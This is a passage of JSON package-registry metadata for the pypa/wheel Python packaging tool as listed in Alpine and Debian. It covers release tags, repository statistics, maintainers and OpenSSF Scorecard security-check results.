GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:26.075Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":25.58491517941603,"stargazers_count":9.03701835151668,"forks_count":7.214479409724412,"average":10.45910323516428},"purl":"pkg:apk/alpine/py3-wheel-doc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.15","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-doc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-doc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-doc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages/py3-wheel-doc/codemeta","maintainers":[{"uuid":"antoine.fontaine@epfl.ch","login":null,"name":"Antoine Fontaine","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","packages_count":18,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Antoine Fontaine","role":null,"created_at":"2023-02-01T15:31:12.297Z","updated_at":"2023-02-01T15:31:12.297Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers/antoine.fontaine@epfl.ch/packages"}],"registry":{"name":"alpine-v3.15","url":"https://pkgs.alpinelinux.org/packages?branch=v3.15","ecosystem":"alpine","default":false,"packages_count":15857,"maintainers_count":287,"namespaces_count":2,"keywords_count":2466,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":786},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.684Z","updated_at":"2026-06-10T05:17:43.390Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.15/namespaces"}},{"id":13722234,"name":"wheel","ecosystem":"debian","description":null,"homepage":"https://github.com/pypa/wheel","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-13T01:05:47.306Z","latest_release_published_at":"2026-02-13T01:05:47.306Z","latest_release_number":"0.38.4-2","last_synced_at":"2026-03-13T09:34:21.574Z","created_at":"2026-02-13T01:05:47.085Z","updated_at":"2026-03-13T09:34:21.800Z","registry_url":"https://tracker.debian.org/pkg/wheel","install_command":"apt-get install wheel","documentation_url":"https://packages.debian.org/bookworm/wheel","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.1","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, python3-all-dev, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-setuptools, python3-sphinx \u003c!nodoc\u003e, tox \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2026-01-22T12:39:15.000Z","size":1854,"stargazers_count":548,"open_issues_count":13,"forks_count":174,"subscribers_count":30,"default_branch":"main","last_synced_at":"2026-02-07T09:12:07.710Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2026-01-31T21:22:34.000Z","dependencies_parsed_at":"2026-01-29T00:01:21.253Z","dependency_job_id":null,"html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":70,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-22T20:33:25.724Z","repository_id":23174547,"created_at":"2025-08-22T20:33:25.724Z","updated_at":"2025-08-22T20:33:25.724Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29350077,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-11T20:11:40.865Z","status":"ssl_error","status_checked_at":"2026-02-11T20:10:41.637Z","response_time":97,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-02-13T01:06:54.427Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/wheel?arch=source\u0026distro=debian-12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-02-13T00:01:56.425Z","issues_count":110,"pull_requests_count":187,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2624958.380116959,"issues_closed_count":98,"pull_requests_closed_count":171,"pull_request_authors_count":38,"issue_authors_count":91,"avg_comments_per_issue":5.872727272727273,"avg_comments_per_pull_request":3.5828877005347595,"merged_pull_requests_count":145,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":11,"past_year_pull_requests_count":24,"past_year_avg_time_to_close_issue":215250.42857142858,"past_year_avg_time_to_close_pull_request":1111066.1,"past_year_issues_closed_count":7,"past_year_pull_requests_closed_count":20,"past_year_pull_request_authors_count":9,"past_year_issue_authors_count":10,"past_year_avg_comments_per_issue":5.0,"past_year_avg_comments_per_pull_request":3.5416666666666665,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":4,"past_year_merged_pull_requests_count":16,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/wheel/codemeta","maintainers":[],"registry":{"name":"debian-12","url":"https://packages.debian.org/bookworm","ecosystem":"debian","default":true,"packages_count":34734,"maintainers_count":0,"namespaces_count":4,"keywords_count":2667,"github":"debian","metadata":{"codename":"bookworm","funded_packages_count":395},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.459Z","updated_at":"2026-06-10T05:17:51.014Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/namespaces"}},{"id":6033886,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":3,"first_release_published_at":"2022-11-22T19:33:17.000Z","latest_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_number":"0.40.0-r1","last_synced_at":"2024-10-29T18:07:05.124Z","created_at":"2023-01-31T17:38:07.485Z","updated_at":"2025-10-30T04:12:44.283Z","registry_url":"https://pkgs.alpinelinux.org/package/edge/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using 